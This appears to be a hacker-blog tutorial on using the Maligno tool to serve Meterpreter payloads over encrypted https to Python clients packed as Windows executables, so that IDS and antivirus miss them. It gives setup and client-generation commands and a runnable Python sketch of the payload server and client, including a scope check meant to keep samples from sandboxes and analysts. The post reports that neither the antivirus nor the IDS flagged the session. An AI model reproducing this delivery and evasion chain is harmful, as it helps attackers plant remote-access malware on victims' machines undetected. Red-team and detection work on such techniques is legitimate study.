Bits and bytes of a hacker.

Encrypted Meterpreter Sessions With Maligno

Attention: This post is now deprecated.

Certain situations call for Meterpreter payloads to be delivered over an encrypted channel, so that a network IDS inspecting the traffic cannot match the staged payload against its signatures. This is something I've desired in the past but never really pursued, until I came across Maligno. Maligno is a tool that serves Metasploit payloads over https, AES-encrypted and base64-encoded, to small Python clients that fetch, decode and run them. The payload pushed to the client can also be run through any of the Metasploit encoders, as many times as you like, to avoid signature matching on the decrypted payload itself (for example by antivirus on the target host).

This is the process of setting up your server:

  1. Download and extract Maligno from the project's site.

  2. Install the prerequisite packages:

sudo apt-get update && sudo apt-get install python-ipcalc

  3. Generate the self-signed SSL certificate the server will present:

./certgen.sh

  4. Configure server.conf so that the server will:

    • Serve three different payloads to three different targets, all over port 443

    • Serve via https

    • Answer only hosts within the scope of your target network (anything else, such as an analyst's sandbox or a scanner, gets nothing)

    • Use the Maligno host's IP as the server address

  5. Generate the Python client scripts that will reach out to Maligno, one per payload index in server.conf:

python clientgen.py -i 0 -f server.conf -o client1.py
python clientgen.py -i 1 -f server.conf -o client2.py
python clientgen.py -i 2 -f server.conf -o client3.py

  6. On a Windows machine, install Python 2.7, pycrypto and py2exe.

  7. Use py2exe to build an executable from each of the three client scripts.

  8. Start the Maligno server and the Meterpreter handler so both are listening for incoming connections.

  9. When one of the crafted executables runs on its target, it fetches its payload over https and an encrypted Meterpreter session opens; in this setup neither the antivirus nor the NIDS flagged it.
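The procedure above boils down to two server-side decisions per request (is the requesting host in scope, and which payload does this client index get) followed by the encrypt-and-base64 step, and the mirror image on the client. The example below is added here to make that flow concrete; it is not Maligno's code and does not use its configuration syntax. The scope list, payload bytes and shared key are constructed stand-ins. Since AES is not in the Python standard library, encryption is done with an HMAC-SHA256 counter-mode keystream plus an HMAC tag so the example runs offline; Maligno itself uses AES via pycrypto, and the wire format here (nonce, ciphertext, tag, base64-encoded) is an illustration of the idea rather than the tool's actual layout.

```python
import base64
import hashlib
import hmac
import ipaddress
import os

# Constructed stand-in for the relevant parts of a server.conf:
# listen port, in-scope networks, and one raw payload per client index.
# The payload bytes are placeholders for msfvenom output, not real shellcode.
SERVER_CONFIG = {
    "listen_port": 443,
    "scope": ["10.10.1.0/24", "10.10.2.50/32"],
    "payloads": {
        0: b"\x90" * 8 + b"payload-for-target-1",
        1: b"\x90" * 8 + b"payload-for-target-2",
        2: b"\x90" * 8 + b"payload-for-target-3",
    },
}

# Constructed shared secret; in the real tool the key is part of the
# server configuration and baked into the generated client.
KEY = hashlib.sha256(b"shared-secret-embedded-in-client").digest()


def keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode; stand-in for AES (not in the stdlib)."""
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt_and_encode(key, plaintext):
    """Server side: encrypt, authenticate, then base64 the whole blob."""
    nonce = os.urandom(16)
    ks = keystream(key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, ks))
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    return base64.b64encode(nonce + ciphertext + tag)


def decode_and_decrypt(key, blob):
    """Client side: undo base64, check the tag, then decrypt."""
    raw = base64.b64decode(blob)
    nonce, ciphertext, tag = raw[:16], raw[16:-32], raw[-32:]
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("payload tampered with or wrong key")
    ks = keystream(key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, ks))


def in_scope(client_ip, scope):
    """True when client_ip falls inside any configured network."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip in ipaddress.ip_network(net) for net in scope)


def serve(config, client_ip, payload_id, key=KEY):
    """What the server returns for one request: the encoded payload,
    or None when the host is out of scope or the index is unknown."""
    if not in_scope(client_ip, config["scope"]):
        return None  # sandbox, analyst or scanner: refuse to hand out anything
    payload = config["payloads"].get(payload_id)
    if payload is None:
        return None
    return encrypt_and_encode(key, payload)


def client_fetch(config, client_ip, payload_id, key=KEY):
    """Client side of the exchange: request, decode, decrypt.
    Returns the raw payload bytes (ready to run) or None."""
    blob = serve(config, client_ip, payload_id, key)
    if blob is None:
        return None
    return decode_and_decrypt(key, blob)


if __name__ == "__main__":
    # In-scope client with index 1 gets its payload back intact.
    print(client_fetch(SERVER_CONFIG, "10.10.1.25", 1))
    # Out-of-scope host gets nothing at all.
    print(client_fetch(SERVER_CONFIG, "192.168.1.5", 1))
```

The scope check is the part worth keeping in mind when filling in server.conf: a payload server that answers anyone will happily hand a sample to whoever pulls the URL out of a proxy log, so the scope should be no wider than the hosts you actually intend to run the clients on.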